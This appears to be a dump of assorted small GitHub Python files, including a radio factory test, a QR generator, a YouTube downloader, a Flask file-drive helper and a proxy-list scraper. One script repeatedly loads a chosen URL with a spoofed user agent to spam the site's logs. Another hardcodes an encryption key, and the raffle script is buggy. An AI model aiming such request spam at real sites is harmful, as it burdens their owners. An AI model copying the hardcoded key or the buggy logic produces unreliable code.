argparse,time\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\n \nparser = argparse.ArgumentParser(description='Reciosbot Will Spam your site introducing funny user agent in logs')\nparser.add_argument('--url', type=str, nargs='?', help='URL to be called')\nparser.add_argument('--user_agent', nargs='?', help='Funny user agent to be used',default='ReciosBot/Doing_My_Part')\nparser.add_argument('--requests', type=int, nargs='?', help='Number of requests to be done', default=5)\nparser.add_argument('--interval', type=float, nargs='?', help='Interval in miliseconds between requests', default=0.5)\ninputArgs = parser.parse_args()\n\n# Some info about runtime\nprint(\"#############################################\")\nprint(\" RECIOSBOT: Navahasos en er pesho since 2021 \")\nprint(\"By Sergio 'EverythingForATeamMate' Fernandez\")\nprint(\"#############################################\")\nprint(\"- Selected URL is \"+inputArgs.url)\nprint(\"- UserAgent \"+ inputArgs.user_agent + \" will be used.\")\nprint(\"- A number of \"+ str(inputArgs.requests) + \" requests will be done, with a \" + str(inputArgs.interval) + \" seconds between requests\")\nprint(\"#############################################\")\n\n# This function makes the magic\ndef call_shit(url, user_agent):\n # Virtual display and so\n display = Display(visible=0, size=(800, 600))\n display.start()\n # UserAgent magic\n options=Options()\n options.set_preference(\"general.useragent.override\", user_agent)\n # Run the headless browser\n driver = Firefox(options=options)\n driver.get(inputArgs.url)\n driver.quit()\n # Obviously, stop the virtual display\n display.stop()\n\ndef main():\n count = 1\n while count <= inputArgs.requests:\n print(\"==> Request number \" + str(count) + \" of \" + str(inputArgs.requests))\n call_shit(inputArgs.url,inputArgs.user_agent)\n time.sleep(inputArgs.interval)\n count += 1\n print(\"############################################\")\n print(\"## PUES YA ESTARÍA ##\")\n print(\"############################################\")\n\nmain()\n","repo_name":"SergioFernandezCordero/reciosbot","sub_path":"reciosbot.py","file_name":"reciosbot.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36808697521","text":"#!/usr/bin/python3\n# 1\n# Read from serial with data coming from RFM12PI with RFM12_Demo sketch \n# All Emoncms code is released under the GNU Affero General Public License.\n\nimport serial, sys, string, time, struct\n\nimport spidev\n\nimport RPi.GPIO as GPIO\nGPIO.setwarnings(False)\n\nfrom RFM69 import Radio\n\n# Set this to the serial port of UART programmer\nusb = serial.Serial('/dev/serial/by-id/usb-Silicon_Labs_CP2102_USB_to_UART_Bridge_Controller_0001-if00-port0', 115200) \n\nboard = {'isHighPower': False, 'interruptPin': 22, 'resetPin': None, 'selPin':26, 'spiDevice': 0, 'encryptionKey':\"89txbe4p8aik5kt3\"}\nradio = Radio(43, 5, 210, verbose=False, **board)\n\n# print (radio.init_success)\n\nradio.__enter__()\n\nusb_str = \"\"\nradio_str = \"\"\n\nrx_msg_flag = {}\n\ntimeout = time.time() + 60 # 7s \n\nwhile 1:\n\n # Read from USB\n if (usb.in_waiting > 0):\n c = usb.read(usb.in_waiting).decode()\n usb_str = usb_str + c\n \n if '\\n' in usb_str:\n usb_str = usb_str.rstrip()\n # print(usb_str)\n inputs = {}\n if usb_str[0:4]==\"temp\":\n #print(usb_str)\n pairs = usb_str.split(\",\")\n for pair in pairs:\n keyval = pair.split(\":\")\n\n inputs[keyval[0]] = keyval[1]\n \n if 'temp' in inputs and 'humidity' in inputs:\n print (\"- SERIAL: temperature: \" + str(inputs.get('temp')) + \" C\")\n print (\"- SERIAL: humidity: \" + str(inputs.get('humidity')) + \" RH\")\n # Check if temp and humidity are in the range 1-100 \n if int(float(inputs.get('temp'))) in range(1,100) and int(float(inputs.get('humidity'))) in range(1,100):\n print(\"SERIAL: PASS\")\n else:\n print(\"SERIAL: **FAIL**\")\n usb_str = \"\"\n \n packet = radio.get_packet()\n if packet:\n # print(packet.sender)\n # print(len(packet.data))\n if packet.sender==23 and len(packet.data)==12:\n unpacked = struct.unpack('hhhhL',bytes(packet.data))\n # print (unpacked)\n temperature = unpacked[0]\n humidity = unpacked[2]\n\n print(\"- RADIO: PASS\")\n print (\"- RADIO temperature: %0.1f C\" % (temperature*0.1))\n print (\"- RADIO humidity: %0.1f RH\" % (humidity*0.1))\n # Check if temp and humidity are in the range 1-100 \n if not int(temperature) in range(10,1000): \n print (\"- Temperature value FAIL\")\n if not int(humidity) in range(10,1000):\n print (\"- Humidity value FAIL\")\n \n sys.exit(0)\n \n if time.time() > timeout:\n break\n time.sleep(0.1)\n\nprint(\"TIMEOUT RADIO: **FAIL**\") \nradio.__exit__()\n","repo_name":"openenergymonitor/factory-test","sub_path":"testscript/test-emonth.py","file_name":"test-emonth.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36593244610","text":"#importing modules..\nimport qrcode, PIL \nfrom PIL import ImageTk,Image\nimport tkinter as tk\nfrom tkinter import ttk,messagebox,filedialog\n\n#functions for qrcode\ndef createQR(*args):\n data = entry.get()\n if data:\n im = qrcode.make(data)\n img = ImageTk.PhotoImage(im)\n qr_canvas.delete(\"all\")\n qr_canvas.create_image(0,0,anchor=tk.NW,image=img)\n qr_canvas.image = img\n else:\n messagebox.showerror(\"Error\",\"Enter any data first!\")\n\ndef saveQR(*args):\n data = entry.get()\n if data:\n img = qrcode.make(data)\n path = filedialog.asksaveasfilename(defaultextension=\".png\")\n if path:\n img.save(path)\n messagebox.showinfo(\"Success\",\"QR code is saved.\")\n else:\n messagebox.showerror(\"Error\",\"Enter any data first!\")\n\n\n# code for GUI\nroot = tk.Tk()\nroot.title(\"QR Code Generator\")\nroot.geometry(\"320x400\")\nroot.config(bg=\"whitesmoke\")\n\nframe1 = tk.Frame(root,bd=2,relief=tk.RAISED,width=300,height=290)\nframe1.place(x=10,y=0)\nframe2 = tk.Frame(root,bd=2,relief=tk.FLAT,width=300,height=100)\nframe2.place(x=10,y=300)\n\ncover_img = ImageTk.PhotoImage(Image.open(\"qr-img-3.png\"))\n\nqr_canvas = tk.Canvas(frame1)\nqr_canvas.create_image(0,0,anchor=tk.NW,image=cover_img)\nqr_canvas.bind(\"\",saveQR)\nqr_canvas.pack(fill=tk.BOTH)\n\nentry = ttk.Entry(frame2,width=35,font=(\"arial\",11),justify=tk.CENTER)\nentry.place(x=5,y=5)\nentry.bind(\"\",createQR)\n\nbut1 = ttk.Button(frame2,text=\"Create\",width=10,command=createQR)\nbut1.place(x=15,y=50)\nbut2 = ttk.Button(frame2,text=\"Save\",width=10,command=saveQR)\nbut2.place(x=100,y=50)\nbut3 = ttk.Button(frame2,text=\"Exit\",width=10,command=root.quit)\nbut3.place(x=180,y=50)\n\nroot.mainloop()","repo_name":"RahulRemanan97/QR-Code-Generator","sub_path":"qrcode_genrator.py","file_name":"qrcode_genrator.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28492554545","text":"'''Ex 3. Uma turma de formandos está vendendo rifas para angariar recursos financeiros para sua\r\ncerimônia de formatura. Construa um programa para cadastrar os nomes das pessoas que compraram a\r\nrifa. Ao fim, o programa deve sortear o ganhador do prêmio e imprimir o seu nome.'''\r\n\r\n\r\nfrom random import choice\r\nlista=[]\r\n\r\n\r\nnome=(input(\"Para encerar digite 'fim'\\nDigite um nome: \"))\r\n\r\nwhile nome != 'fim':\r\n nome=(input(\"Digite um nome: \"))\r\n lista.append(nome)\r\n \r\n\r\nsorteio=choice(lista)\r\nprint(f\"O ganhador foi {lista[0]}\")\r\n\r\n","repo_name":"DanielKloh/python","sub_path":"sorteio.py","file_name":"sorteio.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37505937396","text":"from geom import Point, Vector\nfrom intcode import Computer\n\n\ndef parse_output(out):\n layout = [[]]\n for i in out:\n char = chr(i)\n if char == '\\n':\n layout.append([])\n else:\n layout[-1].append(char)\n if char in '<^>V':\n robot = (len(layout[-1]) - 1, len(layout) - 1, char)\n while not layout[-1]:\n layout.pop()\n return layout, robot\n\n\ndef print_board(board):\n print('\\n'.join([''.join(c for c in row) for row in board]))\n\n\ndef valid_index(layout, point):\n return point.y >= 0 and point.y < len(layout) and point.x >=0 and point.x < len(layout[0])\n\n\ndef walk_scaffold(layout, robot):\n direcs = {'>':Vector(1, 0, 0), '<':Vector(-1, 0, 0), '^':Vector(0, -1, 0), 'V':Vector(0, 1, 0)}\n scaffold = '#'\n\n cur_loc = Point(*robot[:2])\n cur_dir = direcs[robot[-1]]\n cur_run = 0\n moves = []\n while True:\n #print(cur_loc, cur_dir)\n next_loc = cur_loc + cur_dir\n if valid_index(layout, next_loc) and layout[next_loc.y][next_loc.x] == scaffold:\n cur_loc = next_loc\n cur_run += 1\n else:\n if cur_run:\n moves.append(cur_run)\n cur_run = 0\n\n # All of the directions are kinda flipped from expected because we're in a coordinate system\n # where +y is down.\n if cur_dir.x == 1:\n left = cur_loc.down\n right = cur_loc.up\n elif cur_dir.x == -1:\n left = cur_loc.up\n right = cur_loc.down\n elif cur_dir.y == 1:\n left = cur_loc.right\n right = cur_loc.left\n elif cur_dir.y == -1:\n left = cur_loc.left\n right = cur_loc.right\n\n if valid_index(layout, left) and layout[left.y][left.x] == scaffold:\n moves.append('L')\n cur_dir = cur_dir.cross(Vector.k())\n elif valid_index(layout, right) and layout[right.y][right.x] == scaffold:\n moves.append('R')\n cur_dir = Vector.k().cross(cur_dir)\n else:\n break\n\n return ','.join(str(i) for i in moves)\n\n\ndef run(data):\n c = Computer.fromstring(data)\n c.run()\n layout, robot = parse_output(c.output)\n # print_board(layout)\n\n part_a = sum(r * c for r in range(1, len(layout) - 1)\n for c in range(1, len(layout[0]) - 1)\n if {layout[r][c], layout[r + 1][c], layout[r - 1][c], layout[r][c - 1], layout[r][c + 1]} == {'#'})\n\n move_str = walk_scaffold(layout, robot)\n\n # Emprically determined\n sub_a = 'R,10,R,8,L,10,L,10'\n sub_b = 'R,8,L,6,L,6'\n sub_c = 'L,10,R,10,L,6'\n main = move_str.replace(sub_a, 'A').replace(sub_b, 'B').replace(sub_c, 'C')\n\n c = Computer.fromstring(data)\n c.memory[0] = 2\n c.run(main + '\\n' + sub_a + '\\n' + sub_b + '\\n' + sub_c + '\\nn\\n')\n # c.display_ascii()\n return part_a, c.output[-1]\n\n\nif __name__ == '__main__':\n from aocd.models import Puzzle\n\n puz = Puzzle(2019, 17)\n part_a, part_b = run(puz.input_data)\n\n puz.answer_a = part_a\n print(f'Part 1: {puz.answer_a}')\n\n puz.answer_b = part_b\n print(f'Part 2: {puz.answer_b}')\n","repo_name":"dopplershift/advent-of-code","sub_path":"2019/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"37907522117","text":"import random\r\n\r\n'''1 = rock\r\n2 = paper\r\n3 = scissors '''\r\n\r\nresult = 0\r\n\r\nwhile True:\r\n\twhile True:\r\n\t\tprint(\"What would you like to choose?\")\r\n\t\tprint(\"Say 'S' for Scissors 'P' for Paper and 'R' for Rock \")\r\n\t\tchoice = input()\r\n\t\tout = random.randint(1,3)\r\n\t\tchoice = choice.capitalize()\r\n\t\tif choice == \"S\":\r\n\t\t\tprint(\"You chose Scissors\")\r\n\t\t\tbreak\r\n\t\telif choice == \"P\":\r\n\t\t\tprint(\"You chose Paper\")\r\n\t\t\tbreak\r\n\t\telif choice == \"R\":\r\n\t\t\tprint(\"You chose Rock\")\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Please just answer 'S','P' or 'R'\")\r\n\t\t\tcontinue\r\n\r\n\tif ((choice == \"S\") and (out == 3)) or ((choice == \"P\") and (out == 2)) or ((choice == \"R\") and (out == 1)):\r\n\t\tprint(\"It's a DRAW\")\r\n\t\tresult = 0\r\n\telif ((choice == \"S\") and (out == 2)) or ((choice == \"P\") and (out == 1)) or ((choice == \"R\") and (out == 3)):\r\n\t\tprint(\"You WIN\")\r\n\t\tresult += 1\r\n\telse:\r\n\t\tprint(\"You LOSE\")\r\n\t\tresult -= 1\r\n\r\n\tprint(\"You score so far is \" + str(result))\r\n\tprint(\"Press any key to keep playing\")\r\n\tinput()\r\n","repo_name":"TeaPanda/python-Rock-Paper-Scissors","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30705630846","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"Interface to logging package.\n\"\"\"\nimport os\nimport sys\nimport logging\n\nclass Logger(object):\n levels = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warn': logging.WARNING,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n }\n\n def __init__(self,\n filename=None, level='info',\n stream_fmt=None,\n file_fmt='%(message)s'\n ):\n if filename is None:\n # Use the same name of the main script as the default name\n filename = os.path.splitext(os.path.basename(sys.argv[0]))[0] + '.log'\n self.logger = logging.getLogger(filename)\n self.logger.setLevel(self.levels[level])\n if stream_fmt is not None:\n sh = logging.StreamHandler()\n sh.setFormatter(logging.Formatter(stream_fmt))\n self.logger.addHandler(sh) \n th = logging.FileHandler(filename=filename, mode='w', encoding='utf-8')\n th.setFormatter(logging.Formatter(file_fmt))\n self.logger.addHandler(th)\n\nclass BraceMessage:\n def __init__(self, fmt, *args, **kwargs):\n self.fmt = fmt\n self.args = args\n self.kwargs = kwargs\n\n def __str__(self):\n return self.fmt.format(*self.args, **self.kwargs)\n","repo_name":"vINyLogY/minimisTN","sub_path":"minitn/lib/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"31284010584","text":"from flask import jsonify, redirect, url_for, send_file\nfrom os import walk, remove\nfrom os.path import join, isdir\nfrom subprocess import getoutput\nfrom zipfile import ZipFile\nfrom werkzeug.utils import secure_filename\n\n\nclass Data:\n path = \"data\"\n datatypes = [\"json\", \"yml\", \"txt\"]\n files, dirs = [], []\n\n\nclass Documents:\n path = \"documents\"\n datatypes = [\"html\", \"pdf\", \"md\", \"markdown\", \"ipynb\"]\n files, dirs = [], []\n\n\nclass Pictures:\n path = \"pictures\"\n datatypes = [\"jpg\", \"png\", \"svg\", \"gif\", \"jpeg\"]\n files, dirs = [], []\n\n\nclass Videos:\n path = \"videos\"\n datatypes = [\"mp4\", \"mp3\", \"wmv\", \"mkv\"]\n files, dirs = [], []\n\n\nclass Scripts:\n path = \"scripts\"\n datatypes = [\"py\", \"js\", \"css\", \"sqlite3\", \"sh\"]\n files, dirs = [], []\n\n\nclass Drive:\n data = {}\n folders = {\n f.__name__.casefold(): f() for f in (Data, Documents, Pictures, Videos, Scripts)\n }\n\n def __init__(self, path, fdata, fjson):\n self.path = path\n self.fdata = fdata\n self.json_file = fjson(join(path, \"directory.json\"))\n self.update()\n\n def update(self):\n for name in self.folders:\n folder = self.folders[name]\n folder_data = self.fdata(join(self.path, folder.path))\n folder.files = folder_data[\"files\"]\n folder.dirs = folder_data[\"dirs\"]\n self.data[name] = folder_data\n self.json_file.data = self.data\n self.json_file.save()\n return\n\n def route(self, method, request_data):\n if method == \"POST\":\n files = request_data.files.getlist(\"files[]\")\n for fi in files:\n self.upload(fi)\n return redirect(url_for(\"home\"))\n else:\n file_data = self.get(request_data[\"filename\"])\n if all([key in file_data for key in (\"filename\", \"path\")]):\n return send_file(file_data[\"path\"], download_name=file_data[\"filename\"])\n else:\n return jsonify(file_data)\n\n def get(self, filename):\n data = {}\n not_found = {\"response\": f\"filename with name {filename} not found\"}\n for i in self.folders:\n folder = self.__dict__[i]\n file_data = list(filter(lambda x: x[\"name\"] == filename, folder.files))\n if file_data:\n data.update(file_data[0])\n return data\n return not_found\n\n def upload(self, file):\n name = file.__dict__[\"filename\"]\n if name:\n filename = secure_filename(filename=name)\n datatype = filename.split('.')[-1]\n path = self.path\n for i in self.folders:\n folder = self.__dict__[i]\n if datatype in folder.datatypes:\n path = folder.path\n file_path = join(path, filename)\n file.save(file_path)\n self.update()\n return {\"response\": f\"{filename} uploaded to {file_path}\"}\n else:\n return {\"response\": \"No selected file\"}\n\n\nclass Zip:\n\n @staticmethod\n def create(path):\n if isdir(path):\n zip_path = path + \".zip\"\n with ZipFile(zip_path, 'w') as zipObj:\n for folderName, sub_folders, filenames in walk(path):\n for filename in filenames:\n filePath = join(folderName, filename)\n zipObj.write(filePath)\n return {\"filename\": zip_path.split(\"/\")[-1], \"path\": zip_path}\n else:\n return {\"response\": \"folder not found\"}\n\n @staticmethod\n def remove_zip(zip_path):\n remove(zip_path)\n return\n\n @staticmethod\n def get_info_zip(zip_path):\n name = zip_path.split('/')[-1]\n folder_path = zip_path.replace(f\"/{name}\", \"\")\n data = []\n str_data = getoutput(f\"cd {folder_path} && python -m zipfile -l ./{name}\").splitlines()[1:]\n for s in str_data:\n y = s.split()\n print(y)\n data.append({\n \"filename\": y[0],\n \"date\": \" \".join([y[1].replace(\"-\", \"/\"), y[2]]),\n \"size\": y[3]\n })\n print(data)\n return data\n","repo_name":"CircuitalMinds/app","sub_path":"views/drive.py","file_name":"drive.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10693451230","text":"#! /usr/bin/env python2\nfrom spellbee.spellbee import spellbee\n\n\nif __name__ == '__main__':\n test_sentences = open('eval.txt').readlines()\n iter_string = []\n test_sentences = ['So accustomed was I to his invariable success that the very possibility of his failing had ceased to enter into my hed.']\n for sentence in test_sentences:\n \t#print(type(sentence))\n suggestions = spellbee._correct(sentence)\n print(suggestions)","repo_name":"klekkala/lang_model","sub_path":"tests/test_spell.py","file_name":"test_spell.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32307208425","text":"import os, shutil, subprocess\nfrom uuid import uuid4\nfrom pytube import YouTube\nfrom colorama import Fore\n\nfrom yt_ripper.cli.loading import loading_bar\n\ndef get_url():\n url = input(Fore.LIGHTWHITE_EX + \"Url: \" + Fore.LIGHTYELLOW_EX + \"\")\n return url\n\ndef download_video(url, path):\n yt = YouTube(url, use_oauth=True , allow_oauth_cache=True)\n print(Fore.BLUE + \"Fetching Video\")\n yt.streams.get_highest_resolution().download(path)\n # filter(progressive=True, file_extension=\"mp4\").first().download(\n # path\n # )\n loading_bar('Downloading video')\n print(Fore.LIGHTBLUE_EX + \"Download Finish :D\")\n\ndef download_audio_win(yt, path):\n print(Fore.BLUE + \"Downloading Audio\")\n video = yt.streams.filter(only_audio=True).first()\n fileDownloaded = video.download(path)\n base, ext = os.path.splitext(fileDownloaded)\n newFile = base + \".mp3\"\n shutil.copy(fileDownloaded, newFile)\n vPath = os.path.join(path, fileDownloaded)\n os.remove(vPath)\n loading_bar()\n\ndef download_audio(yt, path):\n id = uuid4() \n print(Fore.BLUE + \"Downloading...\")\n yt.streams.filter(\n progressive=True, file_extension=\"mp4\"\n ).first().download(path, filename=f\"{id}.mp4\")\n parent_dir = path\n default_filename = f\"{id}.mp4\"\n new_filename = input(\"Ingresa el nuevo nombre (con extension .mp3): \")\n print(Fore.BLUE + \"Converting to audio\")\n subprocess.run(\n [\n \"ffmpeg\",\n \"-i\",\n os.path.join(parent_dir, default_filename),\n os.path.join(parent_dir, new_filename),\n ],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.STDOUT,\n )\n vid_path = os.path.join(parent_dir, default_filename)\n os.remove(vid_path)\n loading_bar('Finalizando conversion')\n","repo_name":"Atticus64/yt_ripper","sub_path":"yt_ripper/cli/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"52529402","text":"from urllib import quote, unquote\nfrom bs4 import BeautifulSoup\nimport re\nimport requests\n\n\ndef so(q):\n query = quote(q)\n # url = \"https://encrypted.google.com/search?q={0}\".format(query)\n url = \"https://encrypted.google.com/search?q=stackoverflow+{0}\".format(query)\n soup = BeautifulSoup(requests.get(url).text)\n\n answers = soup.findAll(\"h3\", attrs={\"class\": \"r\"})\n if not answers:\n return \":crying_cat_face: Sorry, stackoverflow doesn't have an answer for you :crying_cat_face:\"\n\n # results =\n\n res1 = unquote(re.findall(r\"q=(.*?)&\", str(answers[0]))[0])\n res2 = unquote(re.findall(r\"q=(.*?)&\", str(answers[1]))[0])\n\n # return unquote(re.findall(r\"q=(.*?)&\", str(answer[0]))[0])\n return res1 + \"\\n\" + res2\n\n\ndef on_message(msg, server):\n text = msg.get(\"text\", \"\")\n match = re.findall(r\"!so (.*)\", text)\n if not match: return\n\n return so(match[0])\n","repo_name":"kepler-/ragebot","sub_path":"plugins/stackoverflow.py","file_name":"stackoverflow.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17902532957","text":"#!/usr/bin/python3\nfrom bs4 import BeautifulSoup\nimport requests\nimport os\nfrom io import open\nimport time\nimport sys\nimport time\nprint(sys.platform)\nprint('ESpera un momento ......')\ntime.sleep(2)\n\nsitio='https://free-proxy-list.net/'\ndef respuesta():\n\tres=requests.get(sitio)\n\tsp=BeautifulSoup(res.content,'lxml')\n\tfd=sp.find_all(\"div\",{'class':\"table-responsive fpl-list\"})\n\tfor i in fd:\n\t\tet=i.find_all('td')\n\t\tprint(et)\n\tfor x in et:\n\t\tfor i in x:\n\t\t\tprint(i)\n\ndef rasp():\n\tres=requests.get(sitio)\n\tsp=BeautifulSoup(res.content,'lxml')\n\tfd=sp.find_all(\"div\",{'class':\"modal-body\"})\n\tprint(fd)\n\tfor y in fd:\n\t\tvariable=y.find('textarea')\n\t\t#print(y)\n\t\tnum=str(variable)\n\t\tabrir=open('proxies.txt','a')\n\t\tabrir.write(num)\n\t\tabrir.close()\n\t\tprint('Se han guardado los proxies')\nif __name__=='__main__':\n\tprint('a para checar los proxys mas recientes\\nb para guardarlos')\n\topcion=input('introduce la opcion :')\n\tif opcion == 'a':\n\t\trespuesta()\n\telif opcion =='b':\n\t\trasp()\n\telif opcion =='':\n\t\tprint('finalizo el programa')\n","repo_name":"xelAStone/proxyScrape","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34299411724","text":"# the program contains a function that shows the goods from the menu\n# that can be purchased with a certain amount of money\n\nmenu = {'product_1': 1, 'product_2': 2, 'product_3': 3, 'product_4': 4}\nmoney = 3\n\n\ndef available(menu, money):\n available_goods = []\n\n for key in menu:\n if menu[key] <= money:\n available_goods.append(key)\n\n return(available_goods)\n\n\nprint(available(menu, money))\n","repo_name":"Slepnev-Vladimir/Worms_project","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35413281488","text":"from first_algo.mylogger import logger\n\n\ndef _add(a: int, b: int, a_list: list):\n \"\"\"\n 먼저 매개변수와 인수의 차이에 대해서 알고 넘어가자.\n # 매개변수: 함수의 인자로 전달된 값을 받는 변수(변수라는 것이 중요 포인트)\n # 인수: 함수를 호출할 때 전달하는 입력 값\n # def _add(a, b): -> a, b 는 매개변수, _add(1, 2) -> 1, 2 는 인수\n * important: 매개변수는 함수를 정의, 인수는 함수를 호출할 때\n\n 여기서 파라미터 a 는 인수 x 의 값을 복사해서 온다.\n param a 의 주소 값과, 인수 x 의 주소 값을 보면 같다는 것을 알 수 있다.\n *파이썬에서 모든 것은 객체로 취급되기 때문이다.\n 그런데 여기서 주의해야 할 것은, 파라미터와 인수는 자료형에 따라서 다르게 동작한다는 점이다.\n 예를들면, a 에 다른 값을 대입한다면 x 의 값도 바뀔 것이라고 생각한다는 것인데,\n x 의 값은 변하지 않는다.\n 어디까지나 param a 는 인수 x 를 복사해온 것이기 때문이며, 함수 안에서 다른 값을 대입했을 때는\n 재정의 된다. 그러나 int 자료형 말고 list 를 보자.\n 인수 x_list 를 넘기고 param a_list 는 복사되어 온다. 그 후 a_list 의 값 추가하면,\n x_list 도 동일하게 변경되어있다.\n\n 함수에서 고쳐쓸 수 없는 자료형은 정수와 부동소수점 숫자, 문자열, 튜플 등이다.\n 이러한 자료형을 immutable type 이라고 한다.\n 반면, list, dict, set 과 같은 자료형은 함수에서 고쳐 쓸 수 있음으로 가변현 mutable type 이라고 한다.\n * important: 따라서, 파이썬에서 함수에 인수를 전달할 때는 해당 인수가 불변형인지 가변형인지 의식해서\n 구별해서 써야한다.\n\n \"\"\"\n logger.info(\"***start _add function\")\n assert isinstance(a, int) and isinstance(b, int), f\"Type error, {a} or {b} it not int\"\n assert isinstance(a_list, list), f\"Type error, {c} it not list\"\n\n logger.info(f\"id - a: {id(a)}\")\n logger.info(f\"id - x: {id(x)}\")\n logger.info(f\"a: {a}\")\n logger.info(f\"x: {x}\")\n\n a = 2\n\n logger.info(f\"a: {a}\")\n logger.info(f\"x: {x}\")\n\n a_list.append(3)\n logger.info(f\"c_list: {a_list}\")\n logger.info(f\"x_list: {x_list}\")\n\n\nif __name__ == '__main__':\n x = 1\n y = 2\n x_list = [1, 2]\n _add(x, y, x_list)\n logger.info(\"***end _add function\")\n","repo_name":"pm1100tm/algorithm-practice-python","sub_path":"first_algo/book_1_8_2_pass_by_value_pass_by_reference.py","file_name":"book_1_8_2_pass_by_value_pass_by_reference.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36133087890","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport vtk\r\nfrom vtk.util.numpy_support import vtk_to_numpy\r\n\r\n# read a volume image\r\nreader = vtk.vtkNrrdReader()\r\nreader.SetFileName(\"MRHead.nrrd\")\r\nreader.Update()\r\nimageData = reader.GetOutput()\r\n\r\n# convert from vtkImageData to numpy array\r\nx_dim, y_dim, z_dim = imageData.GetDimensions()\r\nsc = imageData.GetPointData().GetScalars()\r\nimage = vtk_to_numpy(sc)\r\nimage = image.reshape(x_dim, y_dim, z_dim, order='F')\r\nimage = np.rot90(np.flip(image, axis=1))\r\n\r\n# normalize image values\r\nimage = np.divide(image, float(np.max(image)))\r\n\r\n# create a figure\r\nfig = plt.figure(figsize=(16,5))\r\n\r\n\r\n####################\r\n# Task 1a \r\n####################\r\nmaximum_projection = np.max(image, axis=2)\r\nax = fig.add_subplot(1, 3, 1)\r\nax.imshow(maximum_projection, cmap='gray')\r\nax.set_title('Maximum Intensity Projection')\r\n\r\n\r\n\r\n####################\r\n# Task 1b \r\n####################\r\n# I(s) = I(s0) * e^(-tau(s0, s))\r\n\r\ntau = np.sum(image, 2) / image.shape[2] # approximate integral\r\nvolume_rendering_equation = 1 * np.exp(-tau)\r\nvolume_rendering_equation = 1 - volume_rendering_equation\r\nax = fig.add_subplot(1, 3, 2)\r\nax.imshow(volume_rendering_equation, cmap='gray')\r\nax.set_title('Projection using Volume Rendering Equation')\r\n\r\n####################\r\n# Task 1c \r\n####################\r\ngamma = 0\r\nalpha = 0.06\r\n\r\nC = np.zeros(image[:,:,0].shape)\r\na = np.zeros(image[:,:,0].shape)\r\ncurrent_max = np.zeros(image[:,:,0].shape)\r\n\r\nfor i in range(image.shape[2]):\r\n current_max = np.maximum(current_max, image[:,:,i]) # update current maximum along ray\r\n delta = image[:,:,i] - current_max\r\n delta[delta < 0] = 0\r\n if gamma <= 0:\r\n beta = 1 - delta*(1+gamma)\r\n else:\r\n beta = 1 - delta\r\n C = beta*C + (1 - beta*a)*image[:,:,i]\r\n a = beta*a + (1 - beta*a)*alpha\r\n\r\nax = fig.add_subplot(1, 3, 3)\r\nax.imshow(C, cmap='gray')\r\nax.set_title('Projection using MIDA')\r\n\r\n# Always run show, to make sure everything is displayed.\r\nplt.show()","repo_name":"toucanmeister/cdsMaster","sub_path":"Semester 2/Visualisierung/ex07/code/task7_1.py","file_name":"task7_1.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7944508034","text":"import numpy as np\nimport math\nimport bisect\nimport matplotlib.pyplot as plt\n\nclass CubicSpline1D:\n \"\"\"\n 1D Cubic Spline class\n Parameters\n ----------\n x : list\n x coordinates for data points. This x coordinates must be\n sorted\n in ascending order.\n y : list\n y coordinates for data points\n \"\"\"\n\n def __init__(self, x, y):\n h = np.diff(x)\n if np.any(h < 0):\n raise ValueError(\"x coordinates must be sorted in ascending order\")\n\n self.a, self.b, self.c, self.d = [], [], [], []\n self.x = x\n self.y = y\n self.nx = len(x) # dimension of x\n\n # calc coefficient a\n self.a = [iy for iy in y]\n\n # calc coefficient c\n A = self.__calc_A(h)\n B = self.__calc_B(h, self.a)\n self.c = np.linalg.solve(A, B)\n\n # calc spline coefficient b and d\n for i in range(self.nx - 1):\n d = (self.c[i + 1] - self.c[i]) / (3.0 * h[i])\n b = 1.0 / h[i] * (self.a[i + 1] - self.a[i]) \\\n - h[i] / 3.0 * (2.0 * self.c[i] + self.c[i + 1])\n self.d.append(d)\n self.b.append(b)\n\n def 